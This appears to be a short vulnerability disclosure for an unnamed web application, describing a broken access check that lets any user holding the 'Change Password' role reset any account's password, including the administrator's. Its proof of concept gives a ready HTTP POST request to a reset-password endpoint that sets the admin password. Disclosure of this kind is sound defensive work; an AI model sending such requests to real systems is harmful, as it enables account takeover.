# Description
The password change function doesn’t properly handle the `Change Password` role, allowing to any user, that has this role enabled, to change the password of any user in the system, including the administrator account.
# Proof of Concept
1. 1 – Log in as a normal user that can change its own password.
2. 2 – Send the following request:
“`
POST /api/account/reset-password HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Authorization: Bearer
{“username”:”admin”,”password”:”admintakeover”}
“`
3. 3 – The `admin` password is changed successfully
Read More